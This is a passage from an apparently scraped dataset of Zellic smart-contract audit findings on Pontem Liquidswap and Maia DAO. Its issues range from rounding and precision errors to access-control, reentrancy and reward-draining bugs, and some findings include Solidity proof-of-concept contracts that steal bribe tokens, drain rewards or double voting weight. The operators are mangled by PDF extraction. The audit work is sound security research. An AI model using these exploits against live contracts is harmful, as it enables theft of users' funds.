); let _a = u256:)mul(_x, _y); /) ((_x * _x) / 1e18 + (_y * _y) / 1e18) let _b = u256:)add( u256:)mul(_x, _x), u256:)mul(_y, _y), ); u256:)mul(_a, _b) } Zellic Pontem Network However, this means that stable_curve:)lp_value will return inaccurate values when coins have more decimals. Loss of precision in LP value calculations can cause fees to be unexpectedly high: Sit- uations where a swap would theoretically increase LP value might fail. This precision loss will also affect the accuracy of router functions. When coins have more than eight decimals, either rounding should be handled ex- plicitly or they should be disallowed from the protocol. Another option is to use the numerator max(x_scale, y_scale) instead of 10 ^ 8 to mitigate precision loss. Still, coins with unusually high precision would need to be either disallowed or explicitly considered in order to avoid overflow problems. This issue has been acknowledged by Pontem Network. Zellic Pontem Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Pontem Liquidswap - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Incorrect rounding behavior in router:)get_coin_in_with_ fees", + "labels": [ + "Zellic" + ], + "body": "Target: liquidswap::router Category: Coding Mistakes Likelihood: Low Severity: Low : Low In the function router:)get_coin_in_with_fees, the result is rounded up incorrectly for both stable and uncorrelated curves, which can lead to an undue amount being paid in fees. The formula for rounding up integer division is (n - 1)/d + 1 for n > 0. let coin_in = (stable_curve:)coin_in( (coin_out as u128), scale_out, scale_in, (reserve_out as u128), (reserve_in as u128), ) as u64) + 1; (coin_in * fee_scale / fee_multiplier) + 1 The stable curve branch of router:)get_coin_in_with_fees does not correctly imple- ment the formula stated above. let coin_in = math:)mul_div( coin_out, /) y reserve_in * fee_scale, /) rx * 1000 new_reserves_out /) (ry - y) * 997 ) + 1; Furthermore, the uncorrelated curve branch also incorrectly implements the formula stated above. For certain swap amounts, a user could end up paying more in fees than would be accurate. Zellic Pontem Network In the case of the stable curve branch of router:)get_coin_in_with_fees, the code should be rewritten to adhere to the rounded up integer division formula. let coin_in = (stable_curve:)coin_in( (coin_out as u128), scale_out, scale_in, (reserve_out as u128), (reserve_in as u128), ) as u64); let n = coin_in * fee_scale; if (n > 0) { ((n - 1) / fee_multiplier) + 1 } else { } Likewise, the uncorrelated curve branch also needs a revision. /) add to liquidswap:)math public fun mul_div_rounded_up(x: u64, y: u64, z: u64): u64 { assert!(z !) 0, ERR_DIVIDE_BY_ZERO); let n = (x as u128) * (y as u128); let r = if (n > 0) { ((n - 1) / (z as u128)) + 1 } else { } (r as u64) } let coin_in = math:)mul_div_rounded_up( coin_out, /) y reserve_in * fee_scale, /) rx * 1000 new_reserves_out /) (ry - y) * 997 ); Zellic Pontem Network Pontem Network fixed this issue in commit 0b01ed6 Zellic Pontem Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Pontem Liquidswap - Zellic Audit Report.pdf" + }, + { + "title": "3.4 lp_account:)retrieve_signer_cap should be a friend to liq uidity_pool", + "labels": [ + "Zellic" + ], + "body": "Target: liquidswap::lp_account Category: Coding Mistakes Likelihood: Low Severity: Low : Low The function lp_account:)retrieve_signer_cap can currently be called by any mod- ule. If lp_account:)retrieve_signer_cap is called by a function other than liquidity_ pool:)initialize, then the initialization process of Liquidswap will be unable to move forward. The initialization of Liquidswap can be griefed. This will make liquidswap inaccessible to any users. The function lp_account:)retrieve_signer_cap needs to be marked as pub(friend), and the module liquidswap:)liquidity_pool needs to be added as a friend to liquid swap:)lp_account. This issue has been acknowledged by Pontem Network. Zellic Pontem Network 4 Formal Verification The Move language is designed to support formal verifications against specifications. Currently, there are a number of these written for the liquidswap:)math module. We encourage further verification of contract functions as well as some improvements to current specifications. Here are some examples. 4.1 liquidswap:)math First, the specification for math:)overflow_add could be improved. The purpose of this function is to add u128 integers, but allowing for overflow. spec overflow_add { ensures result <) MAX_U128; ensures a + b <) MAX_U128 ==> result =) a + b; ensures a + b > MAX_U128 ==> result !) a + b; ensures a + b > MAX_U128 &) a < (MAX_U128 - b) ==> result =) a - (MAX_U128 - b) - 1; ensures a + b > MAX_U128 &) b < (MAX_U128 - a) ==> result =) b - (MAX_U128 - a) - 1; ensures a + b <) MAX_U128 ==> result =) a + b; } However, this does not reflect how the function should work conceptually. Instead, consider the following specification: spec overflow_add { ///)) The function should never abort. aborts_if false; ///)) Addition should overflow if the sum exceeds `MAX_U128` ensures result =) (a + b) % (MAX_U128 + 1); } This checks that the function cannot abort and makes the desired functionality more clear. Zellic Pontem Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Pontem Liquidswap - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Missing access control on addGaugetoFlywheel", + "labels": [ + "Zellic" + ], + "body": "Target: BribesFactory Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The BribesFactory has a method to add a gauge to an existing flywheel: function addGaugetoFlywheel(address gauge, address bribeToken) external { if (address(flywheelTokens[bribeToken]) =) address(0)) createBribeFlywheel(bribeToken); flywheelTokens[bribeToken].addStrategyForRewards(ERC20(gauge)); } There is no access control on this method, allowing anyone to add a gauge that will end up as a strategy for rewards on the flywheel. Using a malicious strategy, it is possible for an attacker to use a single bHermes token to steal all the bribe tokens from the flywheel rewards contract. This is because gaugeWeight.incrementGauge does not check that the gauge is in the allowlist (see 3.15), allowing the attacker to boost their malicious strategy and cause flywheelBooster.boostedTotalSupply(strategy) to return a value of 1 when accruing the strategy and user: function accrueStrategy(ERC20 strategy, uint256 state) private returns (uint256 rewardsIndex) { uint256 strategyRewardsAccrued = _getAccruedRewards(strategy); rewardsIndex = state; if (strategyRewardsAccrued > 0) { uint256 supplyTokens = address(flywheelBooster) !) address(0) ? flywheelBooster.boostedTotalSupply(strategy) : strategy.totalSupply(); Zellic Maia DAO uint224 deltaIndex; if (supplyTokens !) 0) deltaIndex = ((strategyRewardsAccrued * ONE) / supplyTokens).toUint224(); rewardsIndex += deltaIndex; strategyIndex[strategy] = rewardsIndex; } } function accrueUser(ERC20 strategy, address user, uint256 index) private returns (uint256) { uint256 supplierIndex = userIndex[strategy][user]; userIndex[strategy][user] = index; if (supplierIndex =) 0) { supplierIndex = ONE; } uint256 deltaIndex = index - supplierIndex; uint256 supplierTokens = address(flywheelBooster) !) address(0) ? flywheelBooster.boostedBalanceOf(strategy, user) : strategy.balanceOf(user); uint256 supplierDelta = (supplierTokens * deltaIndex) / ONE; uint256 supplierAccrued = rewardsAccrued[user] + supplierDelta; rewardsAccrued[user] = supplierAccrued; emit AccrueRewards(strategy, user, supplierDelta, index); return supplierAccrued; } As flywheelBooster.boostedTotalSupply(strategy) is equal to flywheelBooster.boost edBalanceOf(strategy, user), the user is rewarded all of the tokens from _getAccrued Rewards(strategy), and this value comes directly from the malicious strategy allowing the users to take all of the bribe tokens. To confirm this finding, we wrote the following test case: contract StealBribes { Zellic Maia DAO UniswapV3GaugeFactory uniswapV3GaugeFactory; address bribeToken; bHermesGauges gaugeWeight; function accrueBribes(address user) public {} function getRewards() public returns (uint) { FlywheelCore flywheel = uniswapV3GaugeFactory.bribesFactory().flywheelTokens(bribeToken); return ERC20(bribeToken).balanceOf(flywheel.flywheelRewards()); } function steal(UniswapV3GaugeFactory _uniswapV3GaugeFactory, address _bribeToken, bHermesGauges _gaugeWeight) external { uniswapV3GaugeFactory = _uniswapV3GaugeFactory; bribeToken = _bribeToken; gaugeWeight = _gaugeWeight; bHermes bHermes = bHermes(gaugeWeight.bHermes()); bHermes.claimWeight(1); gaugeWeight.incrementDelegation(address(this), 1); gaugeWeight.incrementGauge(address(this), 1); uniswapV3GaugeFactory.bribesFactory().addGaugetoFlywheel(address(this), bribeToken); FlywheelCore flywheel = uniswapV3GaugeFactory.bribesFactory().flywheelTokens(bribeToken); FlywheelBribeRewards(flywheel.flywheelRewards()) .setRewardsDepot(SingleRewardsDepot(address(this))); flywheel.accrue(ERC20(address(this)), address(this)); flywheel.claimRewards(address(this)); } } function testBribeGauge() external { MockERC20 bribeToken = new MockERC20(\u201ctest bribe token\u201d, \u201cBTKN\u201d, 18); uniswapV3GaugeFactory.bribesFactory() .createBribeFlywheel(address(bribeToken)); FlywheelCore flywheel = uniswapV3GaugeFactory.bribesFactory() .flywheelTokens(address(bribeToken)); Zellic Maia DAO FlywheelBribeRewards bribeRewards = FlywheelBribeRewards(flywheel.flywheelRewards()); bribeToken.mint(address(bribeRewards), 100000 ether); UniswapV3Gauge gauge = createGaugeAndAddToGaugeBoost(pool, 10); uniswapV3GaugeFactory.addBribeToGauge(gauge, address(bribeToken)); hevm.prank(address(0x666)); StealBribes stealBribes = new StealBribes(); rewardToken.mint(address(this), 1); rewardToken.approve(address(bHermesToken), 1); bHermesToken.deposit(1, address(stealBribes)); hevm.prank(address(0x666)); stealBribes.steal(uniswapV3GaugeFactory, address(bribeToken), bHermesToken.gaugeWeight()); assertEq(bribeToken.balanceOf(address(stealBribes)), 100000 ether); } This allows an attacker to steal all of the bribe tokens held by the flywheel rewards contract. The onlyGaugeFactory modifier should be used to prevent anyone but the factory from adding gauges to the flywheel. This issue was fixed by Maia DAO in commit f7ab226. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Missing transfer hook in TalosStrategyStaked", + "labels": [ + "Zellic" + ], + "body": "Target: TalosStrategyStaked Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The TalosStrategyStaked is created by the TalosStrategyStakedFactory and added to the flywheel: function createTalosV3Strategy( IUniswapV3Pool pool, ITalosOptimizer optimizer, address strategyManager, bytes memory data ) internal override returns (TalosBaseStrategy strategy) { BoostAggregator boostAggregator = abi.decode(data, (BoostAggregator)); strategy = DeployStaked.createTalosV3Strategy( pool, optimizer, boostAggregator, strategyManager, flywheel, owner() ); flywheel.addStrategyForRewards(strategy); } The strategy is responsible for managing a Uniswap V3 non-fungible position and can either rerange or rebalance and try collecting and accruing user rewards. When flywheel.accrue is called, the amount of rewards a user accrues is based on their balance of the strategy: function accrueUser(ERC20 strategy, address user, uint256 index) private returns (uint256) { uint256 supplierIndex = userIndex[strategy][user]; userIndex[strategy][user] = index; Zellic Maia DAO if (supplierIndex =) 0) { supplierIndex = ONE; } uint256 deltaIndex = index - supplierIndex; uint256 supplierTokens = address(flywheelBooster) !) address(0) ? flywheelBooster.boostedBalanceOf(strategy, user) : strategy.balanceOf(user); uint256 supplierDelta = (supplierTokens * deltaIndex) / ONE; uint256 supplierAccrued = rewardsAccrued[user] + supplierDelta; rewardsAccrued[user] = supplierAccrued; emit AccrueRewards(strategy, user, supplierDelta, index); return supplierAccrued; } The issue is that since TalosStrategyStaked implements ERC20, there is nothing to stop someone from transferring their strategy tokens to another user and claiming the re- ward again. To confirm this finding, we wrote the following test case: function testTransferStalkerTokens() public { address user3 = address(0xFACE1); uint amount0Desired = 10000; deposit(amount0Desired, amount0Desired, user1); talosBaseStrategy.rerange(); flywheel.accrue(talosBaseStrategy, user1); assertEq(flywheel.rewardsAccrued(user1), 132275132275132275131); assertEq(flywheel.rewardsAccrued(user2), 0); assertEq(flywheel.rewardsAccrued(user3), 0); uint bal = talosBaseStrategy.balanceOf(user1); hevm.prank(user1); talosBaseStrategy.transfer(user2, bal); flywheel.accrue(talosBaseStrategy, user2); Zellic Maia DAO assertEq(flywheel.rewardsAccrued(user1), 132275132275132275131); assertEq(flywheel.rewardsAccrued(user2), 132275132275133597876); assertEq(flywheel.rewardsAccrued(user3), 0); hevm.prank(user2); talosBaseStrategy.transfer(user3, bal); flywheel.accrue(talosBaseStrategy, user3); assertEq(flywheel.rewardsAccrued(user1), 132275132275132275131); assertEq(flywheel.rewardsAccrued(user2), 132275132275133597876); assertEq(flywheel.rewardsAccrued(user3), 132275132275133597876); } An attacker can accrue rewards for a TalosStrategyStaked strategy and then transfer their strategy tokens and claim the rewards a second time. This can continue allowing the attacker to drain all unclaimed rewards. The TalosStrategyStaked should ensure that flywheel.accrue is called whenever to- kens are transferred, burned, or minted. This issue was fixed by Maia DAO in commits 5b73dd5, 5a996f3, and 227e33d Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Lack of validation when creating a Talos staked strategy", + "labels": [ + "Zellic" + ], + "body": "Target: TalosStrategyStakedFactory Category: Coding Mistakes Likelihood: High Severity: Critical : Critical When creating a new TalosStrategyStaked via the TalosStrategyStakedFactory, the c reateTalosBaseStrategy is called, which in turn calls createTalosV3Strategy and then DeployStaked.createTalosV3Strategy. The strategy is then added to the flywheel: function createTalosBaseStrategy( IUniswapV3Pool pool, ITalosOptimizer optimizer, address strategyManager, bytes memory data ) external { if (optimizerFactory.optimizerIds(TalosOptimizer(address(optimizer))) =) 0) revert UnrecognizedOptimizer(); TalosBaseStrategy strategy = createTalosV3Strategy(pool, optimizer, strategyManager, data); strategyIds[strategy] = strategies.length; strategies.push(strategy); } function createTalosV3Strategy( IUniswapV3Pool pool, ITalosOptimizer optimizer, address strategyManager, bytes memory data ) internal override returns (TalosBaseStrategy strategy) { BoostAggregator boostAggregator = abi.decode(data, (BoostAggregator)); strategy = DeployStaked.createTalosV3Strategy( pool, optimizer, boostAggregator, strategyManager, Zellic Maia DAO flywheel, owner() ); flywheel.addStrategyForRewards(strategy); } library DeployStaked { function createTalosV3Strategy( IUniswapV3Pool pool, ITalosOptimizer optimizer, BoostAggregator boostAggregator, address strategyManager, FlywheelCoreInstant flywheel, address owner ) public returns (TalosBaseStrategy) { return new TalosStrategyStaked( pool, optimizer, boostAggregator, strategyManager, flywheel, owner ); } } The only validation on any of the parameters is that the optimizer was created by the optimizer factory. The pool and strategyManager come directly from the function arguments, and the boostAggregator comes from decoding the user-supplied data. This boost aggregator then provides the strategy nonfungiblePositionManager via _bo ostAggregator.nonfungiblePositionManager(), so it is also controllable. This means that it is very easy to manipulate the balance of the strategy as we can make strategy.deposit always succeed. Using a fake pool, it is possible to do the following: 1. Set up the fake pool that will always mint as many tokens as requested when calling deposit. 2. With user 1, deposit and generate a single-strategy token. Zellic Maia DAO 3. Set up the fake pool to generate a single reward on the next deposit. 4. With user 2, deposit and generate a large number of tokens (this will be the amount of reward tokens stolen). 5. Transfer these tokens back to user 1. 6. Since the balance of user 1 is now high but the user\u2019s reward index is still ONE, they are able to claim as many rewards as they have strategy tokens: uint256 deltaIndex = index - supplierIndex; /) use the booster or token balance to calculate reward balance multiplier uint256 supplierTokens = address(flywheelBooster) !) address(0) ? flywheelBooster.boostedBalanceOf(strategy, user) : strategy.balanceOf(user); /) accumulate rewards by multiplying user tokens by rewardsPerToken index and adding on unclaimed uint256 supplierDelta = (supplierTokens * deltaIndex) / ONE; uint256 supplierAccrued = rewardsAccrued[user] + supplierDelta; rewardsAccrued[user] = supplierAccrued; To confirm this finding, we wrote the following test case: contract FakePool { struct Slot0 { uint160 sqrtPriceX96; int24 tick; uint16 observationIndex; uint16 observationCardinality; uint16 observationCardinalityNext; uint8 feeProtocol; bool unlocked; } struct IncreaseLiquidityParams { uint256 tokenId; uint256 amount0Desired; uint256 amount1Desired; uint256 amount0Min; Zellic Maia DAO uint256 amount1Min; uint256 deadline; } struct CollectParams { uint256 tokenId; address recipient; uint128 amount0Max; uint128 amount1Max; } address public nonfungiblePositionManager = address(this); address public token0 = address(this); address public token1 = address(this); int24 public tickSpacing = 3; uint24 public fee = 3000; Slot0 public slot0; constructor() { slot0.tick = 1000; } function observe(uint32[] calldata) public returns (int56[] memory, uint160[] memory) { int56[] memory tickCumulatives = new int56[](2); uint160[] memory o = new uint160[](2); tickCumulatives[0] = 1000; tickCumulatives[1] = 100000; return (tickCumulatives, o); } function increaseLiquidity(IncreaseLiquidityParams calldata params) public returns ( uint128, uint256, uint256 ) { return (uint128(params.amount0Desired), params.amount0Desired, params.amount0Desired); Zellic Maia DAO } function setOwnRewardsDepot(address) public {} function transferFrom( address, address, uint256 ) public {} function approve(address, uint256) public {} function collect(CollectParams calldata) public returns (uint256, uint256) { return (0, 0); } function depositAndStake(uint256) public {} function transfer(address, uint256) public {} function unstakeAndWithdraw(uint256) public {} fallback() external { revert(); } } function testTalosFactory() external { uint256 INITIAL_REWARDS = 1e18; TalosStrategyStakedFactory talosStrategyStakedFactory; TalosOptimizer talosOptimizer; (pool, poolContract) = UniswapV3Assistant.createPool( uniswapV3Factory, address(token0), address(token1), poolFee ); { OptimizerFactory optimizerFactory = new OptimizerFactory(); Zellic Maia DAO BoostAggregatorFactory boostAggregatorFactory = new BoostAggregatorFactory( uniswapV3StakerContract ); talosStrategyStakedFactory = new TalosStrategyStakedFactory( nonfungiblePositionManager, optimizerFactory, boostAggregatorFactory ); optimizerFactory.createTalosOptimizer( 100, 40, 16, 2000, type(uint256).max, address(this) ); optimizerFactory.createTalosOptimizer( 100, 40, 16, 2000, type(uint256).max, address(this) ); TalosOptimizer[] memory optimizers = optimizerFactory.getOptimizers(); talosOptimizer = optimizers[optimizers.length - 1]; boostAggregatorFactory.createBoostAggregator(address(this)); BoostAggregator[] memory boostAggregators = boostAggregatorFactory .getBoostAggregators(); BoostAggregator boostAggregator = boostAggregators[boostAggregators.length - 1]; talosStrategyStakedFactory.createTalosBaseStrategy( pool, talosOptimizer, address(this), abi.encode(boostAggregator) ); } Zellic Maia DAO FlywheelCoreInstant flywheel = talosStrategyStakedFactory.flywheel(); FlywheelInstantRewards rewards = talosStrategyStakedFactory.rewards(); TalosBaseStrategy[] memory strategies = talosStrategyStakedFactory.getStrategies(); TalosBaseStrategy realStrategy = strategies[strategies.length - 1]; /) realStrategy has some rewards, not yet distributed to everyone rewardToken.mint(address(rewards.rewardsDepot()), INITIAL_REWARDS); flywheel.accrue(realStrategy, address(0x1234)); address attacker1 = address(0x666); address attacker2 = address(0x777); /)attacker starts 1 reward token rewardToken.mint(address(attacker1), 1); hevm.startPrank(attacker1); FakePool fakePool = new FakePool(); talosStrategyStakedFactory.createTalosBaseStrategy( IUniswapV3Pool(address(fakePool)), talosOptimizer, address(fakePool), abi.encode(address(fakePool)) ); strategies = talosStrategyStakedFactory.getStrategies(); TalosBaseStrategy strategy = strategies[strategies.length - 1]; assertEq(rewardToken.balanceOf(attacker1), 1); strategy.deposit(1, 1, attacker1); rewardToken.transfer(address(rewards.rewardsDepot()), 1); strategy.deposit(rewardToken.balanceOf(address(rewards)), 1, attacker2); hevm.stopPrank(); hevm.startPrank(attacker2); strategy.transfer(attacker1, strategy.balanceOf(attacker2)); hevm.stopPrank(); Zellic Maia DAO hevm.startPrank(attacker1); flywheel.accrue(strategy, attacker1); flywheel.claimRewards(attacker1); assertEq(rewardToken.balanceOf(attacker1), INITIAL_REWARDS + 1); } A user is able to use a fake pool to create a malicious strategy and use it to drain any unclaimed rewards. The nonfungiblePositionManager used by the TalosStrategyStaked should be vali- dated to be the same as the TalosBaseStrategyFactory. The supplied pool could also be validated to ensure that it is initialized and known to the nonfungiblePositionMana ger. This issue was fixed by Maia DAO in commit 9b87839. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Reentrancy when incrementing and decrementing gauges", + "labels": [ + "Zellic" + ], + "body": "Target: ERC20Gauges Category: Coding Mistakes Likelihood: High Severity: Critical : High The incrementGauges method takes a list of gauges and a list of weights, iterates through them to increase each supplied gauge with the corresponding weight, and then up- dates the global weights for the user. function incrementGauges(address[] calldata gaugeList, uint112[] calldata weights) external returns (uint256 newUserWeight) { uint256 size = gaugeList.length; if (weights.length !) size) revert SizeMismatchError(); /) store total in summary for a batch update on user/global state uint112 weightsSum; uint32 currentCycle = _getGaugeCycleEnd(); /) Update a gauge's specific state for (uint256 i = 0; i < size; ) { address gauge = gaugeList[i]; uint112 weight = weights[i]; weightsSum += weight; _incrementGaugeWeight(msg.sender, gauge, weight, currentCycle); unchecked { i+); } } return _incrementUserAndGlobalWeights(msg.sender, weightsSum, currentCycle); } When _incrementGaugeWeight is called, it triggers a call to accrueBribes on the sup- plied gauge before adding the weight to the getUserGaugeWeight. Zellic Maia DAO function _incrementGaugeWeight(address user, address gauge, uint112 weight, uint32 cycle) internal { if (_deprecatedGauges.contains(gauge)) revert InvalidGaugeError(); unchecked { if (cycle - block.timestamp <) incrementFreezeWindow) revert IncrementFreezeError(); } IBaseV2Gauge(gauge).accrueBribes(user); bool added = _userGauges[user].add(gauge); /) idempotent add if (added &) _userGauges[user].length() > maxGauges &) !canContractExceedMaxGauges[user]) revert MaxGaugeError(); getUserGaugeWeight[user][gauge] += weight; _writeGaugeWeight(_getGaugeWeight[gauge], _add112, weight, cycle); emit IncrementGaugeWeight(user, gauge, weight, cycle); } Then finally the total weight is checked and the global weights are updated. function _incrementUserAndGlobalWeights(address user, uint112 weight, uint32 cycle) internal returns (uint112 newUserWeight) { newUserWeight = getUserWeight[user] + weight; /) new user weight must be less than or equal to the total user weight if (newUserWeight > getVotes(user)) revert OverWeightError(); /) Update gauge state getUserWeight[user] = newUserWeight; _writeGaugeWeight(_totalWeight, _add112, weight, cycle); } Since there are no checks on whether the gauges have been added to the approved _ Zellic Maia DAO gauges list, there is no nonReentrant on any of the increment/decrement methods and the weight is not checked until the end. It is possible for a user to double their weight during a transaction with the following steps: 1. Increment the target gauge to the user\u2019s max weight. 2. Call incrementGauges with two entries: the first incrementing the target gauge by the user\u2019s max weight again, the second incrementing a malicious contract with weight 0. 3. When accrueBribes is called on the malicious contact, the weight of the target gauge is now double the user\u2019s max weight. 4. After performing any actions using the doubled weight, the malicious contract calls decrementGauge on the target gauge to reduce it to the original before re- turning. This will cause getUserWeight[user] to be set to 0 and return the gauge to its correct value. 5. The global weights for the original incrementGauges are now updated, which sets the getUserWeight[user] back to their max. To confirm this finding, we wrote the following test case: contract DoubleWeights { address gauge1; MockERC20Gauges gaugeWeight; function accrueBribes(address user) public { require( gaugeWeight.getUserGaugeWeight(address(this), address(gauge1)) =) 200, \u201cshould be 200\u201d ); require(gaugeWeight.getVotes(address(this)) =) 100, \u201cshould be 100\u201d); gaugeWeight.decrementGauge(address(gauge1), 100); } function double(address _gauge1, MockERC20Gauges _gaugeWeight) external { gauge1 = _gauge1; gaugeWeight = _gaugeWeight; Zellic Maia DAO gaugeWeight.incrementDelegation(address(this), 100); gaugeWeight.incrementGauge(gauge1, 100); require(gaugeWeight.getUserGaugeWeight(address(this), gauge1) =) 100, \u201cshould be 100\u201d); require(gaugeWeight.getVotes(address(this)) =) 100, \u201cshould be 100\u201d); address[] memory addresses = new address[](2); addresses[0] = gauge1; addresses[1] = address(this); uint112[] memory weights = new uint112[](2); weights[0] = 100; weights[1] = 0; gaugeWeight.incrementGauges(addresses, weights); } } function testGaugeReentrancy() external { hevm.prank(address(0x666)); DoubleWeights doubleWeights = new DoubleWeights(); token.mint(address(doubleWeights), 100); hevm.prank(address(0x666)); doubleWeights.double(address(gauge1), token); } A user is able to increment a gauge to be twice the amount of votes they control for a transaction. The nonReentrant modifier should be added to all of the increment/decrement meth- ods, and the gauges should be checked to ensure they are in the allowed list. Zellic Maia DAO This issue was fixed by Maia DAO in commit 9b87839. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Incorrect calculation of maximum-allowed mint", + "labels": [ + "Zellic" + ], + "body": "Target: ERC4626PartnerManager Category: Coding Mistakes Likelihood: Medium Severity: High : High The ERC4626PartnerManager contract allows partner tokens to be staked in order to receive utility tokens at a rate defined by bHermesRate. ///)) @notice Returns the maximum amount of assets that can be deposited by a user. ///)) @dev Returns the remaining balance of the bHermes divided by the bHermesRate. function maxDeposit(address) public view virtual override returns (uint256) { return (address(bHermesToken).balanceOf(address(this)) - totalSupply) / bHermesRate; } ///)) @notice Returns the maximum amount of assets that can be deposited by a user. ///)) @dev Returns the remaining balance of the bHermes divided by the bHermesRate. function maxMint(address) public view virtual override returns (uint256) { return (address(bHermesToken).balanceOf(address(this)) - totalSupply) / bHermesRate; } function _mint(address to, uint256 amount) internal virtual override { if (amount > maxMint(to)) revert ExceedsMaxDeposit(); bHermesToken.claimOutstanding(); ERC20MultiVotes(partnerGovernance).mint(address(this), amount * bHermesRate); super._mint(to, amount); } The issue is that the maxMint is incorrect when bHermesRate is greater than one because totalSupply should not be divided by bHermesRate. Only the bHermesToken balance Zellic Maia DAO should be, since this was increased by bHermesRate when minting. This allows for more partner bHermes tokens to be minted than there are backing bHermesTokens to support it. To confirm this finding, we wrote the following test case: function testDepositTakeover() public { assertEq(manager.bHermesRate(), 10); address user1 = address(0x111); address attacker = address(0x222); hermes.mint(address(this), 1000); hermes.approve(address(_bHermes), 1000); _bHermes.deposit(1000, address(this)); _bHermes.transfer(address(manager), 1000); partnerAsset.mint(address(user1), 51); hevm.prank(user1); partnerAsset.approve(address(manager), 51); partnerAsset.mint(address(attacker), 200); hevm.prank(attacker); partnerAsset.approve(address(manager), 200); assertEq(manager.maxMint(address(this)), 100); hevm.prank(user1); manager.deposit(51, user1); /) assertEq(manager.maxMint(user1), 49); hevm.prank(attacker); manager.deposit(94, attacker); hevm.prank(attacker); manager.deposit(6, attacker); hevm.prank(attacker); manager.claimOutstanding(); assertEq(manager.balanceOf(attacker), 100); assertEq(manager.partnerGovernance().balanceOf(attacker), 1000); Zellic Maia DAO } Allows a user to mint more partner bHermes tokens than there are underlying assets, preventing other users with staked partner tokens from being able to claim any utility tokens. Only the bHermesToken balance should be divided by the bHermesRate in both maxDepo sit and maxMint. This issue was fixed by Maia DAO in commit 5f00303. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Incorrect total gauge weight calculation", + "labels": [ + "Zellic" + ], + "body": "Target: ERC20Gauges Category: Coding Mistakes Likelihood: High Severity: High : High To help illustrate this issue, it is helpful to have some background on gauge, weight, and the functions that affect _totalWeight. Each gauge address is associated a weight. The weight represents how much of the weekly reward an active gauge will receive. The owner of the contract can manage the gauges and change their state from active to deprecated and vice versa. There are a few functions that are able to decrease the _totalWeight. The _removeGauge function allows the contract owner to add a gauge address to the _ deprecatedGauges array. This function also decreases the _totalWeight by the current weight of the gauge. There are also the decrementGauge and decrementGauges functions, which allow the user to decrease the _getGaugeWeight value for any gauge address (active and depre- cated) while at the same time decreasing the _totalWeight by the input weight value. Below are the steps to reproduce the issue. Preconditions: There are several active gauges. Users have assigned weight to these gauges. The _totalWeight is not zero. Steps: 1. The owner of the contract calls the removeGauge function for one of active gauges. 2. The gauge becomes deprecated; _totalWeight is decreased by the _getGaugeWe ight[gauge].currentWeight value. 3. The user calls the decrementGauge function for the same gauge with full assigned weight value. Zellic Maia DAO 4. The _totalWeight is repeatedly reduced by the getUserGaugeWeight[user][gaug e] value that was already taken into account in step 2, because the _getGaugeWe ight[gauge].currentWeight is the sum of all users\u2019 weight for the current gauge. 5. Anyone starts the queueRewardsForCycle() function of the FlywheelGaugeRewards contract when a new cycle occurs. 6. Inside this function, the nextRewards is calculated for all active gauges using the c alculateGaugeAllocation function, where the quantity value is the total number of rewards queued for the next cycle. But due to the underestimation of the tota l value, the calculateGaugeAllocation function will return an inflated proportion of a quantity for the gauge. function calculateGaugeAllocation(address gauge, uint256 quantity) external view returns (uint256) { if (_deprecatedGauges.contains(gauge)) return 0; uint32 currentCycle = _getGaugeCycleEnd(); uint112 total = _getStoredWeight(_totalWeight, currentCycle); uint112 weight = _getStoredWeight(_getGaugeWeight[gauge], currentCycle); return (quantity * weight) / total; } After the completion of the queueRewardsForCycle function, the total amount of the reward assigned between the gauge contracts will be greater than the actual amount distributed by minter. So, firstly, the rewards will be calculated incorrectly and, sec- ondly, all gauge contracts will not be able to distribute the reward because the r ewardToken balance of the FlywheelGaugeRewards contract is less than the total as- signed amount of weekly reward. It will also be impossible to successfully release full weights from gauges because the _totalWeight will not correspond with the ac- tual total weight. Reduce _totalWeight only for active gauges inside the decrementGauges function. Zellic Maia DAO This issue was fixed by Maia DAO in commit bc08905. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.7 Protocol fee calculation is reversed", + "labels": [ + "Zellic" + ], + "body": "Target: BoostAggregator Category: Coding Mistakes Likelihood: High Severity: High : High The unstakeAndWithdraw function first unstakes the NFT and then calculates the pend- ing rewards and splits it between the user and the protocol based on the current pro tocolFee (the default being 20%). function unstakeAndWithdraw(uint256 tokenId) external { address user = tokenIdToUser[tokenId]; if (user !) msg.sender) revert NotTokenIdOwner(); uniswapV3Staker.unstakeToken(tokenId); uint256 pendingRewards = uniswapV3Staker.tokenIdRewards(tokenId) - tokenIdRewards[tokenId]; if (pendingRewards > DIVISIONER) { uint256 userRewards = (pendingRewards * protocolFee) / DIVISIONER; protocolRewards += pendingRewards - userRewards; address rewardsDepot = userToRewardsDepot[user]; if (rewardsDepot !) address(0)) { uniswapV3Staker.claimReward(rewardsDepot, userRewards); } else { uniswapV3Staker.claimReward(user, userRewards); } } uniswapV3Staker.withdrawToken(tokenId, user, \u201c\u201d); } The issue is that the calculation is backwards; the userRewards will end up being only 20% of the pending rewards and the protocol will take 80%. The protocol will receive a much higher percentage of the fees than intended. Zellic Maia DAO The new protocol rewards can be calculated with (pendingRewards * protocolFee) / DIVISIONER, and then the userRewards is the pendingRewards minus the protocol re- wards. This issue was fixed by Maia DAO in commit 084dfac. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.8 Lack of verification when staking NFT", + "labels": [ + "Zellic" + ], + "body": "Target: UniswapV3Staker Category: Coding Mistakes Likelihood: High Severity: Medium : Low The stakeToken function takes a tokenId and can be used to stake or restake a token: function stakeToken(uint256 tokenId) external override { if 